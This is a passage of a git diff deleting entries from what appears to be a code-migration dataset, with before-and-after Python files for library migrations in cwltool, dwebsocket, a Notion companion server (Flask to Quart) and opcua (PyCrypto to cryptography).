(Dict[str, Any], Graph, Loader.ContextType, str, Dict[str, rdflib.namespace.Namespace], str) -> None - if t["type"] == "record": - recordname = t["name"] - -@@ -86,12 +103,14 @@ def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - predicate = "%s:%s" % (defaultPrefix, recordname) - - if context.get(recordname, predicate) != predicate: -- raise Exception("Predicate collision on '%s', '%s' != '%s'" % (recordname, context[recordname], predicate)) -+ raise Exception("Predicate collision on '%s', '%s' != '%s'" % ( -+ recordname, context[recordname], predicate)) - - if not recordname: - raise Exception() - -- _logger.debug("Adding to context '%s' %s (%s)", recordname, predicate, type(predicate)) -+ _logger.debug("Adding to context '%s' %s (%s)", -+ recordname, predicate, type(predicate)) - context[recordname] = predicate - - for i in t.get("fields", []): -@@ -119,7 +138,8 @@ def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - # TODO generate range from datatype. - - if isinstance(i["type"], dict) and "name" in i["type"]: -- process_type(i["type"], g, context, defaultBase, namespaces, defaultPrefix) -+ process_type(i["type"], g, context, defaultBase, -+ namespaces, defaultPrefix) - - if "extends" in t: - for e in aslist(t["extends"]): -@@ -132,31 +152,26 @@ def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - - - def salad_to_jsonld_context(j, schema_ctx): -- context = {} -+ # type: (Iterable, Dict[str, Any]) -> Tuple[Loader.ContextType, Graph] -+ context = {} # type: Loader.ContextType - namespaces = {} - g = Graph() - defaultPrefix = "" - -- for k,v in schema_ctx.items(): -+ for k, v in schema_ctx.items(): - context[k] = v - namespaces[k] = rdflib.namespace.Namespace(v) - - if "@base" in context: -- defaultBase = context["@base"] -+ defaultBase = cast(str, context["@base"]) - del context["@base"] - else: - defaultBase = "" - -- for k,v in namespaces.items(): -+ for k, v in namespaces.items(): - g.bind(k, v) - - for t in j: - process_type(t, g, context, defaultBase, namespaces, defaultPrefix) - - return (context, g) -- --if __name__ == "__main__": -- with open(sys.argv[1]) as f: -- j = yaml.load(f) -- (ctx, g) = salad_to_jsonld_context(j) -- print(json.dumps(ctx, indent=4, sort_keys=True)) diff --git a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.source.py b/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.source.py deleted file mode 100644 index 33028f1..0000000 --- a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.source.py +++ /dev/null @@ -1,162 +0,0 @@ -import shutil -import json -import yaml -import os -import subprocess -import copy -import pprint -import re -import sys -import rdflib -from rdflib import Graph, URIRef -import rdflib.namespace -from rdflib.namespace import RDF, RDFS -try: - import urlparse -except ImportError: - import urllib.parse as urlparse - unicode=str - basestring=str -import logging -from .aslist import aslist -if sys.version_info >= (2,7): - import typing - -_logger = logging.getLogger("salad") - -def pred(datatype, field, name, context, defaultBase, namespaces): - split = urlparse.urlsplit(name) - - v = None - - if split.scheme: - v = name - (ns, ln) = rdflib.namespace.split_uri(unicode(v)) - name = ln - if ns[0:-1] in namespaces: - v = unicode(namespaces[ns[0:-1]][ln]) - _logger.debug("name, v %s %s", name, v) - - if field and "jsonldPredicate" in field: - if isinstance(field["jsonldPredicate"], dict): - v = {} - for k, val in field["jsonldPredicate"].items(): - v[("@"+k[1:] if k.startswith("_") else k)] = val - else: - v = field["jsonldPredicate"] - elif "jsonldPredicate" in datatype: - for d in datatype["jsonldPredicate"]: - if d["symbol"] == name: - v = d["predicate"] - # if not v: - # if field and "jsonldPrefix" in field: - # defaultBase = field["jsonldPrefix"] - # elif "jsonldPrefix" in datatype: - # defaultBase = datatype["jsonldPrefix"] - - if not v: - v = defaultBase + name - - if name in context: - if context[name] != v: - raise Exception("Predicate collision on %s, '%s' != '%s'" % (name, context[name], v)) - else: - _logger.debug("Adding to context '%s' %s (%s)", name, v, type(v)) - context[name] = v - - return v - -def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - if t["type"] == "record": - recordname = t["name"] - - _logger.debug("Processing record %s\n", t) - - classnode = URIRef(recordname) - g.add((classnode, RDF.type, RDFS.Class)) - - split = urlparse.urlsplit(recordname) - if "jsonldPrefix" in t: - predicate = "%s:%s" % (t["jsonldPrefix"], recordname) - elif split.scheme: - (ns, ln) = rdflib.namespace.split_uri(unicode(recordname)) - predicate = recordname - recordname = ln - else: - predicate = "%s:%s" % (defaultPrefix, recordname) - - if context.get(recordname, predicate) != predicate: - raise Exception("Predicate collision on '%s', '%s' != '%s'" % (recordname, context[recordname], predicate)) - - if not recordname: - raise Exception() - - _logger.debug("Adding to context '%s' %s (%s)", recordname, predicate, type(predicate)) - context[recordname] = predicate - - for i in t.get("fields", []): - fieldname = i["name"] - - _logger.debug("Processing field %s", i) - - v = pred(t, i, fieldname, context, defaultPrefix, namespaces) - - if isinstance(v, basestring): - v = v if v[0] != "@" else None - else: - v = v["_@id"] if v.get("_@id", "@")[0] != "@" else None - - if v: - (ns, ln) = rdflib.namespace.split_uri(unicode(v)) - if ns[0:-1] in namespaces: - propnode = namespaces[ns[0:-1]][ln] - else: - propnode = URIRef(v) - - g.add((propnode, RDF.type, RDF.Property)) - g.add((propnode, RDFS.domain, classnode)) - - # TODO generate range from datatype. - - if isinstance(i["type"], dict) and "name" in i["type"]: - process_type(i["type"], g, context, defaultBase, namespaces, defaultPrefix) - - if "extends" in t: - for e in aslist(t["extends"]): - g.add((classnode, RDFS.subClassOf, URIRef(e))) - elif t["type"] == "enum": - _logger.debug("Processing enum %s", t["name"]) - - for i in t["symbols"]: - pred(t, None, i, context, defaultBase, namespaces) - - -def salad_to_jsonld_context(j, schema_ctx): - context = {} - namespaces = {} - g = Graph() - defaultPrefix = "" - - for k,v in schema_ctx.items(): - context[k] = v - namespaces[k] = rdflib.namespace.Namespace(v) - - if "@base" in context: - defaultBase = context["@base"] - del context["@base"] - else: - defaultBase = "" - - for k,v in namespaces.items(): - g.bind(k, v) - - for t in j: - process_type(t, g, context, defaultBase, namespaces, defaultPrefix) - - return (context, g) - -if __name__ == "__main__": - with open(sys.argv[1]) as f: - j = yaml.load(f) - (ctx, g) = salad_to_jsonld_context(j) - print(json.dumps(ctx, indent=4, sort_keys=True)) diff --git a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.target.py b/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.target.py deleted file mode 100644 index 79d9833..0000000 --- a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.target.py +++ /dev/null @@ -1,177 +0,0 @@ -import collections -import shutil -import json -import ruamel.yaml as yaml -try: - from ruamel.yaml import CSafeLoader as SafeLoader -except ImportError: - from ruamel.yaml import SafeLoader # type: ignore -import os -import subprocess -import copy -import pprint -import re -import sys -import rdflib -from rdflib import Graph, URIRef -import rdflib.namespace -from rdflib.namespace import RDF, RDFS -import urlparse -import logging -from .aslist import aslist -from typing import Any, cast, Dict, Iterable, Tuple, Union -from .ref_resolver import Loader - -_logger = logging.getLogger("salad") - - -def pred(datatype, field, name, context, defaultBase, namespaces): - # type: (Dict[str, Union[Dict, str]], Dict, str, Loader.ContextType, str, Dict[str, rdflib.namespace.Namespace]) -> Union[Dict, str] - split = urlparse.urlsplit(name) - - vee = None # type: Union[str, unicode] - - if split.scheme: - vee = name - (ns, ln) = rdflib.namespace.split_uri(unicode(vee)) - name = ln - if ns[0:-1] in namespaces: - vee = unicode(namespaces[ns[0:-1]][ln]) - _logger.debug("name, v %s %s", name, vee) - - v = None # type: Any - - if field and "jsonldPredicate" in field: - if isinstance(field["jsonldPredicate"], dict): - v = {} - for k, val in field["jsonldPredicate"].items(): - v[("@" + k[1:] if k.startswith("_") else k)] = val - else: - v = field["jsonldPredicate"] - elif "jsonldPredicate" in datatype: - if isinstance(datatype["jsonldPredicate"], collections.Iterable): - for d in datatype["jsonldPredicate"]: - if isinstance(d, dict): - if d["symbol"] == name: - v = d["predicate"] - else: - raise Exception( - "entries in the jsonldPredicate List must be " - "Dictionaries") - else: - raise Exception("jsonldPredicate must be a List of Dictionaries.") - # if not v: - # if field and "jsonldPrefix" in field: - # defaultBase = field["jsonldPrefix"] - # elif "jsonldPrefix" in datatype: - # defaultBase = datatype["jsonldPrefix"] - - ret = v or vee - - if not ret: - ret = defaultBase + name - - if name in context: - if context[name] != ret: - raise Exception("Predicate collision on %s, '%s' != '%s'" % - (name, context[name], ret)) - else: - _logger.debug("Adding to context '%s' %s (%s)", name, ret, type(ret)) - context[name] = ret - - return ret - - -def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - # type: (Dict[str, Any], Graph, Loader.ContextType, str, Dict[str, rdflib.namespace.Namespace], str) -> None - if t["type"] == "record": - recordname = t["name"] - - _logger.debug("Processing record %s\n", t) - - classnode = URIRef(recordname) - g.add((classnode, RDF.type, RDFS.Class)) - - split = urlparse.urlsplit(recordname) - if "jsonldPrefix" in t: - predicate = "%s:%s" % (t["jsonldPrefix"], recordname) - elif split.scheme: - (ns, ln) = rdflib.namespace.split_uri(unicode(recordname)) - predicate = recordname - recordname = ln - else: - predicate = "%s:%s" % (defaultPrefix, recordname) - - if context.get(recordname, predicate) != predicate: - raise Exception("Predicate collision on '%s', '%s' != '%s'" % ( - recordname, context[recordname], predicate)) - - if not recordname: - raise Exception() - - _logger.debug("Adding to context '%s' %s (%s)", - recordname, predicate, type(predicate)) - context[recordname] = predicate - - for i in t.get("fields", []): - fieldname = i["name"] - - _logger.debug("Processing field %s", i) - - v = pred(t, i, fieldname, context, defaultPrefix, namespaces) - - if isinstance(v, basestring): - v = v if v[0] != "@" else None - else: - v = v["_@id"] if v.get("_@id", "@")[0] != "@" else None - - if v: - (ns, ln) = rdflib.namespace.split_uri(unicode(v)) - if ns[0:-1] in namespaces: - propnode = namespaces[ns[0:-1]][ln] - else: - propnode = URIRef(v) - - g.add((propnode, RDF.type, RDF.Property)) - g.add((propnode, RDFS.domain, classnode)) - - # TODO generate range from datatype. - - if isinstance(i["type"], dict) and "name" in i["type"]: - process_type(i["type"], g, context, defaultBase, - namespaces, defaultPrefix) - - if "extends" in t: - for e in aslist(t["extends"]): - g.add((classnode, RDFS.subClassOf, URIRef(e))) - elif t["type"] == "enum": - _logger.debug("Processing enum %s", t["name"]) - - for i in t["symbols"]: - pred(t, None, i, context, defaultBase, namespaces) - - -def salad_to_jsonld_context(j, schema_ctx): - # type: (Iterable, Dict[str, Any]) -> Tuple[Loader.ContextType, Graph] - context = {} # type: Loader.ContextType - namespaces = {} - g = Graph() - defaultPrefix = "" - - for k, v in schema_ctx.items(): - context[k] = v - namespaces[k] = rdflib.namespace.Namespace(v) - - if "@base" in context: - defaultBase = cast(str, context["@base"]) - del context["@base"] - else: - defaultBase = "" - - for k, v in namespaces.items(): - g.bind(k, v) - - for t in j: - process_type(t, g, context, defaultBase, namespaces, defaultPrefix) - - return (context, g) diff --git a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.diff b/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.diff deleted file mode 100644 index 3821684..0000000 --- a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.diff +++ /dev/null @@ -1,25 +0,0 @@ -diff --git a/examples/run_gevent.py b/examples/run_eventlet.py - index d502899a360447682cdb7e618507edab94b40c0c..d707ff652fd74c3420e83a50fc9b1b9026ed0d98 100644 - --- a/examples/run_gevent.py - +++ b/examples/run_eventlet.py -@@ -1,8 +1,9 @@ -+from eventlet import wsgi, patcher -+patcher.monkey_patch() -+ - import sys - import getopt --from gevent import monkey --monkey.patch_all() --from gevent.pywsgi import WSGIServer -+import eventlet - from examples.wsgi import application - - -@@ -11,5 +12,5 @@ opts, _ = getopt.getopt(sys.argv[1:], "b:") - for opt, value in opts: - if opt == '-b': - addr, port = value.split(":") --server = WSGIServer((addr, int(port)), application) --server.serve_forever() -+ -+wsgi.server(eventlet.listen((addr, int(port))), application) diff --git a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.source.py b/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.source.py deleted file mode 100644 index 7a0e1db..0000000 --- a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.source.py +++ /dev/null @@ -1,15 +0,0 @@ -import sys -import getopt -from gevent import monkey -monkey.patch_all() -from gevent.pywsgi import WSGIServer -from examples.wsgi import application - - -addr, port = '127.0.0.1', 8000 -opts, _ = getopt.getopt(sys.argv[1:], "b:") -for opt, value in opts: - if opt == '-b': - addr, port = value.split(":") -server = WSGIServer((addr, int(port)), application) -server.serve_forever() diff --git a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.target.py b/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.target.py deleted file mode 100644 index 2fca4c0..0000000 --- a/v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.target.py +++ /dev/null @@ -1,16 +0,0 @@ -from eventlet import wsgi, patcher -patcher.monkey_patch() - -import sys -import getopt -import eventlet -from examples.wsgi import application - - -addr, port = '127.0.0.1', 8000 -opts, _ = getopt.getopt(sys.argv[1:], "b:") -for opt, value in opts: - if opt == '-b': - addr, port = value.split(":") - -wsgi.server(eventlet.listen((addr, int(port))), application) diff --git a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.diff b/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.diff deleted file mode 100644 index 16739aa..0000000 --- a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.diff +++ /dev/null @@ -1,225 +0,0 @@ -diff --git a/Python Server/app/server.py b/Python Server/app/server.py - index a0b14922f3153e4a793022cebf370d23dbb61a46..002f5bde5d5d5f2eaaf6999e41e4619817c10400 100644 - --- a/Python Server/app/server.py - +++ b/Python Server/app/server.py -@@ -1,23 +1,18 @@ --import os - import logging - --from flask import send_from_directory --from flask import render_template --from flask import Flask, flash, request, redirect, url_for -+from quart import Quart, render_template, flash, request, redirect - from werkzeug.utils import secure_filename - --import json - import secrets - --from utils import ask_server_port, save_options, save_data, append_data, createFolder -+from utils import ask_server_port, save_options, save_data, createFolder - from NotionAI import * - --from threading import Thread -- - UPLOAD_FOLDER = '../app/uploads/' --ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif']) -+ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif','webp']) -+ -+app = Quart(__name__) - --app = Flask(__name__) - app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER - logging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s', - level=logging.INFO) -@@ -26,45 +21,25 @@ notion = NotionAI(logging) - - - @app.route('/add_url_to_mind') --def add_url_to_mind(): -+async def add_url_to_mind(): - url = request.args.get('url') - title = request.args.get('title') -- thread = Thread(target=notion.add_url_to_database, args=(url, title)) -- thread.daemon = True -- thread.start() -- return "200" -+ return str(notion.add_url_to_database(url, title)) - - - @app.route('/add_text_to_mind') --def add_text_to_mind(): -+async def add_text_to_mind(): - url = request.args.get('url') - text = request.args.get('text') -- thread = Thread(target=notion.add_text_to_database, args=(str(text), str(url))) -- thread.daemon = True -- thread.start() -- return "200" -+ return str(notion.add_text_to_database(text, url)) - - - @app.route('/add_image_to_mind') --def add_image_to_mind(): -+async def add_image_to_mind(): - url = request.args.get('url') - image_src = request.args.get('image_src') - image_src_url = request.args.get('image_src_url') -- thread = Thread(target=notion.add_image_to_database, args=(str(url), str(image_src), str(image_src_url))) -- thread.daemon = True -- thread.start() -- return "200" -- -- --@app.route('/add_video_to_mind') --def add_video_to_mind(): -- url = request.args.get('url') -- video_src = request.args.get('video_src') -- video_src_url = request.args.get('video_src_url') -- -- # notion.add_text_to_database(str(url),str(text)) -- # print(str(notion.statusCode)) -- return str(notion.statusCode) -+ return str(notion.add_image_to_database(url, image_src, image_src_url)) - - - def allowed_file(filename): -@@ -72,55 +47,41 @@ def allowed_file(filename): - filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS - - --@app.route('/upload_file', methods=['GET', 'POST']) --def upload_file(): -+@app.route('/upload_file', methods=['POST']) -+async def upload_file(): - createFolder("uploads") -- if request.method == 'POST': -- # check if the post request has the file part -- if 'file' not in request.files: -- flash('No file part') -- return redirect(request.url) -- file = request.files['file'] -- # if user does not select file, browser also -- # submit an empty part without filename -- if file.filename == '': -- flash('No selected file') -- return redirect(request.url) -- if file and allowed_file(file.filename): -- filename = secure_filename(file.filename) -- file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) -- uri = os.path.join(app.config['UPLOAD_FOLDER'], filename) -- -- thread = Thread(target=notion.add_image_to_database_by_post,args=(uri,)) -- thread.daemon = True -- thread.start() -- # notion.add_image_to_database_by_post(os.path.join(app.config['UPLOAD_FOLDER'], filename)) -- return "File Uploaded Succesfully" -- -- --@app.route('/add_audio_to_mind') --def add_audio_to_mind(): -- url = request.args.get('url') -- audio_src = request.args.get('audio_src') -- audio_src_url = request.args.get('audio_src_url') -- -- # notion.add_text_to_database(str(url),str(text)) -- # print(str(notion.statusCode)) -- return str(notion.statusCode) -+ status_code = 200 -+ # check if the post request has the file part -+ request_files = await request.files -+ -+ if 'file' not in request_files: -+ flash('No file part') -+ status_code = 500 -+ -+ file = request_files['file'] -+ # if user does not select file, browser also -+ # submit an empty part without filename -+ if file.filename == '': -+ flash('No selected file') -+ status_code = 500 -+ if file and allowed_file(file.filename): -+ filename = secure_filename(file.filename) -+ file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) -+ uri = os.path.join(app.config['UPLOAD_FOLDER'], filename) -+ return str(notion.add_image_to_database(uri)) -+ else: -+ print("This file is not allowed to be post") -+ status_code = 500 -+ return str(notion.create_json_response(status_code=status_code)) - - - @app.route('/get_current_mind_url') --def get_current_mind_url(): -+async def get_current_mind_url(): - return str(notion.data['url']) - - --@app.route('/get_notion_token_v2') --def get_notion_token_v2(): -- return str(notion.data['token']) -- -- - @app.route('/update_notion_tokenv2') --def update_notion_tokenv2(): -+async def update_notion_tokenv2(): - token_from_extension = request.args.get('tokenv2') - changed = False - with open('data.json') as json_file: -@@ -145,38 +106,44 @@ def update_notion_tokenv2(): - - - @app.route('/') --def show_settings_home_menu(): -- return render_template("options.html") -+async def show_settings_home_menu(): -+ return await render_template("options.html") - - - @app.route('/handle_data', methods=['POST']) --def handle_data(): -- notion_url = request.form['notion_url'] -- notion_token = request.form['notion_token'] -+async def handle_data(): -+ data = await request.get_json() -+ print(data) -+ notion_url = data['notion_url'] -+ -+ notion_token = data['notion_token'] - -- use_email = request.form['email'] and request.form['password'] -+ use_email = data['email'] and data['password'] - -- if request.form['clarifai_key']: -- clarifai_key = request.form['clarifai_key'] -+ if data['clarifai_key']: -+ clarifai_key = data['clarifai_key'] - save_data(logging, url=notion_url, token=notion_token, clarifai_key=clarifai_key) - use_clarifai = True - else: - save_data(logging, url=notion_url, token=notion_token) - use_clarifai = False - -- delete_after_tagging = request.form.getlist('delete_after_tagging') -+ if "delete_after_tagging" in data: -+ delete_after_tagging = data['delete_after_tagging'] -+ else: -+ delete_after_tagging = False - - save_options(logging, use_clarifai=use_clarifai, delete_after_tagging=delete_after_tagging) - - if use_email: -- has_run = notion.run(logging, email=request.form['email'], password=request.form['password']) -+ has_run = notion.run(logging, email=data['email'], password=data['password']) - else: - has_run = notion.run(logging) - - if has_run: -- return render_template("thank_you.html") -+ return "200" - else: -- return render_template("error.html") -+ return "500" - - - if __name__ == "__main__": diff --git a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.source.py b/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.source.py deleted file mode 100644 index ecb4d00..0000000 --- a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.source.py +++ /dev/null @@ -1,186 +0,0 @@ -import os -import logging - -from flask import send_from_directory -from flask import render_template -from flask import Flask, flash, request, redirect, url_for -from werkzeug.utils import secure_filename - -import json -import secrets - -from utils import ask_server_port, save_options, save_data, append_data, createFolder -from NotionAI import * - -from threading import Thread - -UPLOAD_FOLDER = '../app/uploads/' -ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif']) - -app = Flask(__name__) -app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER -logging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s', - level=logging.INFO) - -notion = NotionAI(logging) - - -@app.route('/add_url_to_mind') -def add_url_to_mind(): - url = request.args.get('url') - title = request.args.get('title') - thread = Thread(target=notion.add_url_to_database, args=(url, title)) - thread.daemon = True - thread.start() - return "200" - - -@app.route('/add_text_to_mind') -def add_text_to_mind(): - url = request.args.get('url') - text = request.args.get('text') - thread = Thread(target=notion.add_text_to_database, args=(str(text), str(url))) - thread.daemon = True - thread.start() - return "200" - - -@app.route('/add_image_to_mind') -def add_image_to_mind(): - url = request.args.get('url') - image_src = request.args.get('image_src') - image_src_url = request.args.get('image_src_url') - thread = Thread(target=notion.add_image_to_database, args=(str(url), str(image_src), str(image_src_url))) - thread.daemon = True - thread.start() - return "200" - - -@app.route('/add_video_to_mind') -def add_video_to_mind(): - url = request.args.get('url') - video_src = request.args.get('video_src') - video_src_url = request.args.get('video_src_url') - - # notion.add_text_to_database(str(url),str(text)) - # print(str(notion.statusCode)) - return str(notion.statusCode) - - -def allowed_file(filename): - return '.' in filename and \ - filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS - - -@app.route('/upload_file', methods=['GET', 'POST']) -def upload_file(): - createFolder("uploads") - if request.method == 'POST': - # check if the post request has the file part - if 'file' not in request.files: - flash('No file part') - return redirect(request.url) - file = request.files['file'] - # if user does not select file, browser also - # submit an empty part without filename - if file.filename == '': - flash('No selected file') - return redirect(request.url) - if file and allowed_file(file.filename): - filename = secure_filename(file.filename) - file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) - uri = os.path.join(app.config['UPLOAD_FOLDER'], filename) - - thread = Thread(target=notion.add_image_to_database_by_post,args=(uri,)) - thread.daemon = True - thread.start() - # notion.add_image_to_database_by_post(os.path.join(app.config['UPLOAD_FOLDER'], filename)) - return "File Uploaded Succesfully" - - -@app.route('/add_audio_to_mind') -def add_audio_to_mind(): - url = request.args.get('url') - audio_src = request.args.get('audio_src') - audio_src_url = request.args.get('audio_src_url') - - # notion.add_text_to_database(str(url),str(text)) - # print(str(notion.statusCode)) - return str(notion.statusCode) - - -@app.route('/get_current_mind_url') -def get_current_mind_url(): - return str(notion.data['url']) - - -@app.route('/get_notion_token_v2') -def get_notion_token_v2(): - return str(notion.data['token']) - - -@app.route('/update_notion_tokenv2') -def update_notion_tokenv2(): - token_from_extension = request.args.get('tokenv2') - changed = False - with open('data.json') as json_file: - options = json.load(json_file) - - if token_from_extension != options['token']: - try: - options['token'] = token_from_extension - - client = NotionClient(token_v2=options['token']) # if can't make a client out of the token, it is not - # a correct one. - - a_file = open("data.json", "w") - json.dump(options, a_file) - a_file.close() - - logging.info("Token v2 changed to {}".format(token_from_extension)) - changed = notion.run() - except requests.exceptions.HTTPError: - logging.info("Incorrect token V2 from notion") - return str(changed) - - -@app.route('/') -def show_settings_home_menu(): - return render_template("options.html") - - -@app.route('/handle_data', methods=['POST']) -def handle_data(): - notion_url = request.form['notion_url'] - notion_token = request.form['notion_token'] - - use_email = request.form['email'] and request.form['password'] - - if request.form['clarifai_key']: - clarifai_key = request.form['clarifai_key'] - save_data(logging, url=notion_url, token=notion_token, clarifai_key=clarifai_key) - use_clarifai = True - else: - save_data(logging, url=notion_url, token=notion_token) - use_clarifai = False - - delete_after_tagging = request.form.getlist('delete_after_tagging') - - save_options(logging, use_clarifai=use_clarifai, delete_after_tagging=delete_after_tagging) - - if use_email: - has_run = notion.run(logging, email=request.form['email'], password=request.form['password']) - else: - has_run = notion.run(logging) - - if has_run: - return render_template("thank_you.html") - else: - return render_template("error.html") - - -if __name__ == "__main__": - secret = secrets.token_urlsafe(32) - app.secret_key = secret - port = ask_server_port(logging) - app.run(host="0.0.0.0", port=port, debug=True) diff --git a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.target.py b/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.target.py deleted file mode 100644 index c9c4da0..0000000 --- a/v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.target.py +++ /dev/null @@ -1,153 +0,0 @@ -import logging - -from quart import Quart, render_template, flash, request, redirect -from werkzeug.utils import secure_filename - -import secrets - -from utils import ask_server_port, save_options, save_data, createFolder -from NotionAI import * - -UPLOAD_FOLDER = '../app/uploads/' -ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif','webp']) - -app = Quart(__name__) - -app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER -logging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s', - level=logging.INFO) - -notion = NotionAI(logging) - - -@app.route('/add_url_to_mind') -async def add_url_to_mind(): - url = request.args.get('url') - title = request.args.get('title') - return str(notion.add_url_to_database(url, title)) - - -@app.route('/add_text_to_mind') -async def add_text_to_mind(): - url = request.args.get('url') - text = request.args.get('text') - return str(notion.add_text_to_database(text, url)) - - -@app.route('/add_image_to_mind') -async def add_image_to_mind(): - url = request.args.get('url') - image_src = request.args.get('image_src') - image_src_url = request.args.get('image_src_url') - return str(notion.add_image_to_database(url, image_src, image_src_url)) - - -def allowed_file(filename): - return '.' in filename and \ - filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS - - -@app.route('/upload_file', methods=['POST']) -async def upload_file(): - createFolder("uploads") - status_code = 200 - # check if the post request has the file part - request_files = await request.files - - if 'file' not in request_files: - flash('No file part') - status_code = 500 - - file = request_files['file'] - # if user does not select file, browser also - # submit an empty part without filename - if file.filename == '': - flash('No selected file') - status_code = 500 - if file and allowed_file(file.filename): - filename = secure_filename(file.filename) - file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) - uri = os.path.join(app.config['UPLOAD_FOLDER'], filename) - return str(notion.add_image_to_database(uri)) - else: - print("This file is not allowed to be post") - status_code = 500 - return str(notion.create_json_response(status_code=status_code)) - - -@app.route('/get_current_mind_url') -async def get_current_mind_url(): - return str(notion.data['url']) - - -@app.route('/update_notion_tokenv2') -async def update_notion_tokenv2(): - token_from_extension = request.args.get('tokenv2') - changed = False - with open('data.json') as json_file: - options = json.load(json_file) - - if token_from_extension != options['token']: - try: - options['token'] = token_from_extension - - client = NotionClient(token_v2=options['token']) # if can't make a client out of the token, it is not - # a correct one. - - a_file = open("data.json", "w") - json.dump(options, a_file) - a_file.close() - - logging.info("Token v2 changed to {}".format(token_from_extension)) - changed = notion.run() - except requests.exceptions.HTTPError: - logging.info("Incorrect token V2 from notion") - return str(changed) - - -@app.route('/') -async def show_settings_home_menu(): - return await render_template("options.html") - - -@app.route('/handle_data', methods=['POST']) -async def handle_data(): - data = await request.get_json() - print(data) - notion_url = data['notion_url'] - - notion_token = data['notion_token'] - - use_email = data['email'] and data['password'] - - if data['clarifai_key']: - clarifai_key = data['clarifai_key'] - save_data(logging, url=notion_url, token=notion_token, clarifai_key=clarifai_key) - use_clarifai = True - else: - save_data(logging, url=notion_url, token=notion_token) - use_clarifai = False - - if "delete_after_tagging" in data: - delete_after_tagging = data['delete_after_tagging'] - else: - delete_after_tagging = False - - save_options(logging, use_clarifai=use_clarifai, delete_after_tagging=delete_after_tagging) - - if use_email: - has_run = notion.run(logging, email=data['email'], password=data['password']) - else: - has_run = notion.run(logging) - - if has_run: - return "200" - else: - return "500" - - -if __name__ == "__main__": - secret = secrets.token_urlsafe(32) - app.secret_key = secret - port = ask_server_port(logging) - app.run(host="0.0.0.0", port=port, debug=True) diff --git a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.diff b/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.diff deleted file mode 100644 index 90fadfe..0000000 --- a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.diff +++ /dev/null @@ -1,161 +0,0 @@ -diff --git a/opcua/uacrypto.py b/opcua/uacrypto.py - index 64e049595105c46600316e6ff2e127a329c6a219..cdaff1575780a99ab035abb08a6ad13414cd4859 100644 - --- a/opcua/uacrypto.py - +++ b/opcua/uacrypto.py -@@ -1,113 +1,63 @@ --from Crypto.Util.asn1 import DerSequence --from ssl import PEM_cert_to_DER_cert --from ssl import DER_cert_to_PEM_cert --import base64 --import hashlib -+import os - -+from cryptography import x509 -+from cryptography.hazmat.backends import default_backend -+from cryptography.hazmat.primitives import serialization -+from cryptography.hazmat.primitives import hashes -+from cryptography.hazmat.primitives.asymmetric import padding - --from Crypto.Signature import PKCS1_v1_5 --from Crypto.Hash import SHA256 --from Crypto.Hash import SHA --from Crypto.PublicKey import RSA --from Crypto.Cipher import AES --from Crypto.Cipher import PKCS1_OAEP --from Crypto import Hash --from Crypto import Random - --BS = 16 --pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) --unpad = lambda s: s[:-ord(s[len(s) - 1:])] -+def load_certificate(path): -+ _, ext = os.path.splitext(path) -+ with open(path, "br") as f: -+ if ext == ".pem": -+ 